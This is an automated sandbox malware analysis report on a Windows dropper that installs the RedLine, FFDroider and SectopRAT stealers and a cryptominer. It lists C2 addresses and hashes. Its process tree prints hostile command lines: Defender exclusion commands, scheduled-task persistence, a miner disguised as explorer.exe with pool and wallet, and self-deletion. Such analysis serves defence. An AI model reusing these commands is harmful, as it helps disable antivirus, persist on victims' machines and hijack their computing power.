Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-10-2024 18:32

General

  • Target

    53186ce79e6468105c773438acbe87f1_JaffaCakes118.exe

  • Size

    2.6MB

  • MD5

    53186ce79e6468105c773438acbe87f1

  • SHA1

    de01fcb76fbabf23a120cee47467b0256704e37a

  • SHA256

    9dbdfabbc99542e1c94b7a29eaf437b7fa4c898c4add1a677b126257ae54f94e

  • SHA512

    b711bb7536ed70391db73ccf54ea5f0bb841aa9f0e2c5e97a693cbf3a68caac9511260d4f8acfbb6a86cdae89b4e958cb465c4b440bb62df30cb67806357e7a6

  • SSDEEP

    49152:SunqyEbov0BhJ/0xMW5InyH/tp/pmBCXjn98XEEibJcXDNX:SKqycMnpfzh/n9IiA

Malware Config

Extracted

Family

ffdroider

C2

http://186.2.171.3

Extracted

Family

redline

Botnet

Build1

C2

45.142.213.135:30058

Signatures

  • FFDroider

    Stealer targeting social media platform users first seen in April 2022.

  • FFDroider payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 18 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\53186ce79e6468105c773438acbe87f1_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\53186ce79e6468105c773438acbe87f1_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\GloryWsetp.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\GloryWsetp.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:548
      • C:\Users\Admin\AppData\Local\Temp\Chrome3.exe
        "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1576
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3100
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4900
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4264
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2260
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1792
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4008
          • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
            C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Chrome3.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:796
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4400
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                7⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1548
            • C:\Windows\system32\services64.exe
              "C:\Windows\system32\services64.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:5076
              • C:\Windows\system32\cmd.exe
                "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1268
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5024
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2680
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1180
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1868
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                7⤵
                  PID:5300
                  • C:\Users\Admin\AppData\Local\Temp\svchost64.exe
                    C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                    8⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5352
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                      9⤵
                        PID:5428
                        • C:\Windows\system32\schtasks.exe
                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                          10⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:5584
                      • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                        9⤵
                        • Executes dropped EXE
                        PID:5508
                      • C:\Windows\explorer.exe
                        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                        9⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5720
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                        9⤵
                          PID:5756
                          • C:\Windows\system32\choice.exe
                            choice /C Y /N /D Y /T 3
                            10⤵
                              PID:5844
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3008
                      • C:\Windows\system32\choice.exe
                        choice /C Y /N /D Y /T 3
                        7⤵
                          PID:3304
                • C:\Users\Admin\AppData\Local\Temp\GloryWSetp.exe
                  "C:\Users\Admin\AppData\Local\Temp\GloryWSetp.exe"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4424
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"
                2⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:384
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:4380
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffApp2.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\KiffApp2.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:4256
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"
                2⤵
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:3028
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\smpub3.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\smpub3.exe"
                2⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1268
                • C:\Users\Admin\AppData\Local\Temp\is-F6150.tmp\smpub3.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-F6150.tmp\smpub3.tmp" /SL5="$1501BC,506086,422400,C:\Users\Admin\AppData\Local\Temp\RarSFX0\smpub3.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:1944
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                2⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious use of WriteProcessMemory
                PID:2804
                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1560
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
                    4⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3680
                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
                    "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
                    4⤵
                    • Executes dropped EXE
                    PID:4508
                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
                    "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
                    4⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:668
                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:3896
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS95C3.tmp\Install.cmd" "
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:436
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7
                      5⤵
                      • Enumerates system info in registry
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:4132
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9925846f8,0x7ff992584708,0x7ff992584718
                        6⤵
                          PID:4960
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,6340698972581311387,9200121279968780498,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
                          6⤵
                            PID:3468
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,6340698972581311387,9200121279968780498,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
                            6⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4344
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,6340698972581311387,9200121279968780498,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8
                            6⤵
                              PID:652
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,6340698972581311387,9200121279968780498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                              6⤵
                                PID:1548
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,6340698972581311387,9200121279968780498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
                                6⤵
                                  PID:4192
                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,6340698972581311387,9200121279968780498,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 /prefetch:8
                                  6⤵
                                    PID:1128
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,6340698972581311387,9200121279968780498,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 /prefetch:8
                                    6⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:3392
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,6340698972581311387,9200121279968780498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
                                    6⤵
                                      PID:1936
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,6340698972581311387,9200121279968780498,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
                                      6⤵
                                        PID:2300
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,6340698972581311387,9200121279968780498,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
                                        6⤵
                                          PID:1548
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,6340698972581311387,9200121279968780498,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
                                          6⤵
                                            PID:4868
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:5052
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:2712

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                      Filesize

                                      2KB

                                      MD5

                                      d85ba6ff808d9e5444a4b369f5bc2730

                                      SHA1

                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                      SHA256

                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                      SHA512

                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log

                                      Filesize

                                      539B

                                      MD5

                                      b245679121623b152bea5562c173ba11

                                      SHA1

                                      47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

                                      SHA256

                                      73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

                                      SHA512

                                      75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1cr.exe.log

                                      Filesize

                                      1KB

                                      MD5

                                      8ec831f3e3a3f77e4a7b9cd32b48384c

                                      SHA1

                                      d83f09fd87c5bd86e045873c231c14836e76a05c

                                      SHA256

                                      7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

                                      SHA512

                                      26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                      Filesize

                                      152B

                                      MD5

                                      443a627d539ca4eab732bad0cbe7332b

                                      SHA1

                                      86b18b906a1acd2a22f4b2c78ac3564c394a9569

                                      SHA256

                                      1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9

                                      SHA512

                                      923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                      Filesize

                                      152B

                                      MD5

                                      99afa4934d1e3c56bbce114b356e8a99

                                      SHA1

                                      3f0e7a1a28d9d9c06b6663df5d83a65c84d52581

                                      SHA256

                                      08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8

                                      SHA512

                                      76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\7e94562a-f391-4cca-aac3-a65fc47fe495.tmp

                                      Filesize

                                      180B

                                      MD5

                                      4bc8a3540a546cfe044e0ed1a0a22a95

                                      SHA1

                                      5387f78f1816dee5393bfca1fffe49cede5f59c1

                                      SHA256

                                      f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca

                                      SHA512

                                      e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      5KB

                                      MD5

                                      f368d6033588417dcd1cac893cec15cd

                                      SHA1

                                      6dfb9aeb4bde358b71670199f3461e0860b97e0e

                                      SHA256

                                      c469c9be4bcf607aa7ab1c050b49e1d79fcb7cb711a0248a33ba17ed3d2273a9

                                      SHA512

                                      435b977f70e8a1c66a5baa1d83a7b51f4ff0b74383716c7d589b7bfd0bb9932acc1b172fc67196031e875144bbaa157524ad8ddb606c91d5ed35997a8992929c

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      6KB

                                      MD5

                                      4ee32827a6623c0a07fe3bf278c04ab1

                                      SHA1

                                      1f3692c6de11bccaaa2fdfd777547903aad118fe

                                      SHA256

                                      a740320e5a283f0b884a6f43e69c8e30e2685db3f30f389d71642e563a54ccce

                                      SHA512

                                      bcb9124e17f9bec6a7acab75ef0ec73bf5071bfa9f67387b2406183d6b8756e21486aecfd4910be03f99e1bb85d1542f71324e974a6a1c6cbb3d0f8ba90e194c

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                      Filesize

                                      16B

                                      MD5

                                      206702161f94c5cd39fadd03f4014d98

                                      SHA1

                                      bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                      SHA256

                                      1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                      SHA512

                                      0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                      Filesize

                                      16B

                                      MD5

                                      46295cac801e5d4857d09837238a6394

                                      SHA1

                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                      SHA256

                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                      SHA512

                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                      Filesize

                                      11KB

                                      MD5

                                      f13a96339dc11cb7ebc5141bf34110da

                                      SHA1

                                      4b9919d254d6e06dcadd9991aa296c0e6213f59b

                                      SHA256

                                      0ab25590aefa193e287fcf7f9d6a34bec6af19ebfccf928e4d585799bb5e4e14

                                      SHA512

                                      ffb6e97934c446ef671243f753020b11c6c1194140eccc6d55ae74354a22b91a0e78c231226294382ce93b0f01e3908cb3c8a14a20e74143533321d186a71171

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      944B

                                      MD5

                                      22310ad6749d8cc38284aa616efcd100

                                      SHA1

                                      440ef4a0a53bfa7c83fe84326a1dff4326dcb515

                                      SHA256

                                      55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

                                      SHA512

                                      2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      944B

                                      MD5

                                      e7894a0a14b4fe073bbb9576465a46b1

                                      SHA1

                                      f154489d98cc4b09fbb0a002fa20771eec108462

                                      SHA256

                                      7fcc8a41f5c2846bc3da46204b85194b5e6996195e1ff30a1765831ee475a60d

                                      SHA512

